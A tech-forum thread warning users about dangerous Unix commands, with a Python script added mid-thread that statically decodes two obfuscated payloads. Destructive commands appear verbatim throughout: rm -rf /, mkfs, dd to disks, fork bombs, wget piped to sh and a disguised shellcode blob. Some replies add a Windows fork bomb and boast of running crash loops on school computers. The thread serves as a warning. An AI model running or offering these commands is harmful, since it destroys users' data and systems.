  • Malicious commands you shouldn't run.

    Due to some issues I have seen on other forums I thought it may be a good idea to post this here.

    Here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.

    Again, DANGEROUS COMMANDS -- look but DO NOT RUN.

    Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".

    Deletion Commands:
    Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
    Code:
    rm -rf /
    rm -rf .
    rm -rf *
    The only problem is that .., the link to the previous directory, will be matched by this and this will in turn delete everything above this directory level (oops!). A possible alternative that I can think of for this would be

    Code:
    rm -r .[^.]*
    which will exclude the entry "..". Of course, it probably has limitations of not matching certain entries, fixing which is an exercise left to the reader.

    Permissions changing:
    Code:
    chmod -R 777 /
    Will change the permissions for everything on the entire drive which will not just be insecure etc... but will break a LOT of things and the only fix is a full wipe and reinstall...... unless you have about a year on your hands to fix it all.

    Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
    Code:
    mkfs
    mkfs.ext3
    mkfs.anything
    Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
    Code:
    any_command > /dev/sda
    dd if=something of=/dev/sda
    Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
    In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiosity provokes)
    Code:
    :(){:|:&};:
    In Perl
    Code:
    fork while fork
    I have seen forkbombs in use and they act very fast. Wiki article is here

    Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make a habit of decompressing tars inside a cleanly made directory.

    Decompression bomb:
    Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source.

    Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust.
    Code:
    wget http://some_place/some_file
    sh ./some_file
    Code:
    wget http://some_place/some_file -O- | sh
    Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

    A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
    Code:
    char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
        = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
          "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
          "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
          "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
          "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
          "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
          "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
          "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
    To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.


    Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

    For example, 30 seconds in Python yields something like this:

    Code:
    python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
    Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example -- I wouldn't expect anyone to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong.


    This is simply a copypasta from another forum. If anyone wants to make this a sticky please feel free. If you want any more commands added please pm me.
    Last edited by Lorem-Ipsum; 05-09-11, 14:29.
    Desktop: Intel i5-4690K | 16GB DDR3 | Gigabyte Z97N-WIFI | EVGA GTX 660 3GB | Windows 10
    Server 0: Gen8 HP Microserver | Proxmox Hypervisor Server 1: Gen8 HP Microserver | FreeNAS
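Added example, not from the original post or from any project it mentions: a small Python analysis script that checks two of the post's claims without executing anything. It decodes the fake sudo proof-of-concept's byte string to show the command it really hands to /bin/sh -c, and it statically evaluates the string-building argument of the "30 seconds in Python" one-liner to show what os.system would receive. The byte string and the one-liner are copied from the post; the function names, the split between machine code and decoy text, the narrow instruction scan (it only understands the push/not/jmp/call shape of this blob, it is not a disassembler) and the whitelist of allowed names are this example's own choices.

```python
import ast
import re
import struct

# --- 1. The fake "sudo proof of concept" --------------------------------------------
# Copy of the post's esp[] byte string, split into the machine code and the readable
# decoy that the C source appends to it (the code never references the decoy).
FAKE_SUDO_POC = (
    b"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
    b"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
    b"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
    b"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
    b"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
    b"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
    b"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
)
DECOY_TEXT = b"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"


def decode_hidden_command(code: bytes) -> str:
    """Recover the string the blob assembles on the stack and then un-NOTs in place.

    A narrow scan for this blob's shape, not a disassembler: before `push esp; pop esi`
    (54 5e) there are only short setup instructions and `push imm32` (68 xx xx xx xx);
    after it, f7 16 / f7 56 xx are `not dword [esi+off]` over the pushed words.
    """
    setup_end = code.index(b"\x54\x5e")
    pushed, i = [], 0
    while i < setup_end:
        if code[i] == 0x68:                    # immediate bytes are stored little-endian
            pushed.append(code[i + 1:i + 5])   # and land in memory in that same order
            i += 5
        else:
            i += 1
    nots = re.findall(rb"\xf7\x16|\xf7\x56.", code[setup_end:], re.DOTALL)
    if len(nots) != len(pushed):
        raise ValueError("push/not count mismatch: not the expected blob shape")
    image = b"".join(reversed(pushed))         # last push sits at the lowest address
    plain = bytes(b ^ 0xFF for b in image)
    return plain.split(b"\x00", 1)[0].decode("ascii")


def decode_argv(blob: bytes) -> list[str]:
    """Rebuild the argv the blob passes to execve by following its jmp/call/pop idiom."""
    call_at = 2 + blob[1]                      # eb 3e: short jmp forward to the call
    if blob[call_at] != 0xE8:
        raise ValueError("jmp does not land on a call")
    data_at = call_at + 5                      # the call pushes the address of these bytes
    rel32 = struct.unpack("<i", blob[call_at + 1:data_at])[0]
    if data_at + rel32 != blob.index(b"\x5b"):  # ... and returns to `pop ebx`
        raise ValueError("call does not return to pop ebx")
    data = blob[data_at:]
    path = data.split(b"\x00", 1)[0]           # push ebx -> argv[0]
    flag = data[len(path) + 1:].split(b"\x00", 1)[0]  # lea esi,[ebx+8]; push esi -> argv[1]
    return [path.decode(), flag.decode(), decode_hidden_command(blob)]  # argv[2]


# --- 2. The "30 seconds in Python" one-liner --------------------------------------------
OBFUSCATED_ONE_LINER = 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

# Whitelist (this example's choice) of what a string-building argument may contain.
SAFE_NAMES = {"chr": chr, "ord": ord, "str": str, "len": len}
SAFE_NODES = (ast.Call, ast.Attribute, ast.Constant, ast.ListComp, ast.comprehension,
              ast.Name, ast.BinOp, ast.Add, ast.Sub, ast.Load, ast.Store, ast.List, ast.Tuple)


def preview_os_system_args(source: str) -> list[str]:
    """Return the string each os.system(...) call in `source` would receive, without
    running the call: only the argument expression is evaluated, and only when it is
    built from literals, comprehensions, str.join and the SAFE_NAMES helpers."""
    previews = []
    for node in ast.walk(ast.parse(source)):
        is_os_system = (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                        and isinstance(node.func.value, ast.Name)
                        and node.func.value.id == "os" and node.func.attr == "system")
        if not is_os_system:
            continue
        for arg in node.args:
            bound = {t.id for n in ast.walk(arg) if isinstance(n, ast.comprehension)
                     for t in ast.walk(n.target) if isinstance(t, ast.Name)}
            for sub in ast.walk(arg):
                if not isinstance(sub, SAFE_NODES):
                    raise ValueError(f"refusing to evaluate {type(sub).__name__}")
                if isinstance(sub, ast.Attribute) and sub.attr != "join":
                    raise ValueError(f"refusing attribute .{sub.attr}")
                if isinstance(sub, ast.Name) and sub.id not in SAFE_NAMES and sub.id not in bound:
                    raise ValueError(f"refusing unknown name {sub.id}")
            expr = ast.fix_missing_locations(ast.Expression(body=arg))
            previews.append(eval(compile(expr, "<os.system arg>", "eval"),
                                 {"__builtins__": {}, **SAFE_NAMES}))
    return previews


if __name__ == "__main__":
    print("fake sudo PoC really runs:", decode_argv(FAKE_SUDO_POC + DECOY_TEXT))
    print("python one-liner would run:", preview_os_system_args(OBFUSCATED_ONE_LINER))
```

Run it and the first line shows `['/bin/sh', '-c', 'rm -rf ~ / &']`: the four `push` immediates, NOT-ed back, are the real command, and the "cp -p /bin/sh ..." text after the `-c` terminator is never pointed to by anything. The second line shows `['rm -rf *']`. Both functions refuse input that does not have the expected shape rather than guessing, which is the right failure mode for a tool you run before deciding whether to trust a paste.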

  • #2
    Interesting read!
    PC1: Q6600 - 4GB DDR2-800 - ATI HD4850 1GB
    PC2: X2 3800 - 1GB DDR-400 - ATI 9250 256mb
    HTPC: E6600 - 2GB DDR2-533 - ATI HD5450 512mb



    • #3
      Forkbomb, interesting.

      I'll have to run this on someone's PC at school when they're not looking



      • #4
        Linux stuff this, I think.

        It was after reading up on things like this I stopped using Ubuntu.
        "Those able to see beyond the shadows and lies of their culture will never be understood, let alone believed, by the masses."
        Plato



        • #5
          Originally posted by Toonshorty View Post
          Forkbomb, interesting.

          I'll have to run this on someone's PC at school when they're not looking
          In windows you just need to run
          Code:
          %0|%0
          in cmd.
          Quite nasty. I have seen computers freeze up instantly.

          Originally posted by marsey99 View Post
          Linux stuff this, I think.

          It was after reading up on things like this I stopped using Ubuntu.
          why?

          It's even easier to run cracks and the like on Windows. lol



          • #6
            I've run

            Code:
            :loop
            start notepad.exe
            goto loop
            on school computers once; we had competitions to see whose could crash first.



            • #7
              Originally posted by marsey99 View Post
              Linux stuff this, I think.

              It was after reading up on things like this I stopped using Ubuntu.
              Why? Many of these could easily be implemented on Windows; it's just that historically there's not really been any need for them, since there have been so many holes in Internet Explorer that web-based exploits have been the most effective way of wreaking havoc.

              Also, a lot of these commands would only be especially nasty when run as 'root' (*nix superuser account). Most modern Linux distros provide tools like sudo, gksudo etc. which mean that users don't need to be logged in as root full-time; basically you should only log on as root if you actually know what you are doing. In fact modern distributions work perfectly without ever having to open a terminal and run anything at all on the command line.

              Avoiding Linux due to security concerns is a pretty bizarre decision. Your chances of being compromised by malware are massively higher on Windows, but in both cases it ultimately comes down to common sense - don't run untrusted applications (whether these are executables or command line scripts like those listed here) and generally you won't have any problems.



              • #8
                Back in the Win 95/98 days I used to go in places like PC World and edit the Autoexec.bat file putting in all sorts of loops and messy looking things. I wonder if the staff knew how to sort it out or if they would have to pack it up and send it back to Packard Bell etc.



                • #9
                  Would the forkbombs stop after you restart it?
                  i7 950 @4GHz | 460 | 520 | 12Gb Mushkin RAM | H60 | Crucial M4 128gb | OCZ Onyx 240gb | Asus P6X58D-E | Asus Xonar D2X | R.A.T 9 Mouse | Corsair 1KW | LG BLu-ray Reader

                  Originally posted by Simon1987
                  I need to start spreading some reputation around just so I can +/- 0 you later.



                  • #10
                    Originally posted by Pullen View Post
                    Would the forkbombs stop after you restart it?
                    Yeah they would, that one probably wouldn't cause any serious harm.



                    • #11
                      Originally posted by Pullen View Post
                      Would the forkbombs stop after you restart it?
                      Yes they would. The problems occur if the script starting them also places them in the startup folder, or in .xinitrc on Linux.

                      However this can usually be stopped by booting in safemode.



                      • #12
                        Just thought I would give this thread a bump for new members.



                        • #13
                          Ask to get it stickied?
                          i7 2600k | MSI GTX 580 Twin Frozr II



                          • #14
                            Originally posted by sb89 View Post
                            Ask to get it stickied?
                            maybe a good idea. I'll PM a mod/admin,

                            EDIT: Thanks DT



                            • #15
                              Stop tempting me, I'm going to make a VM and do them now lol
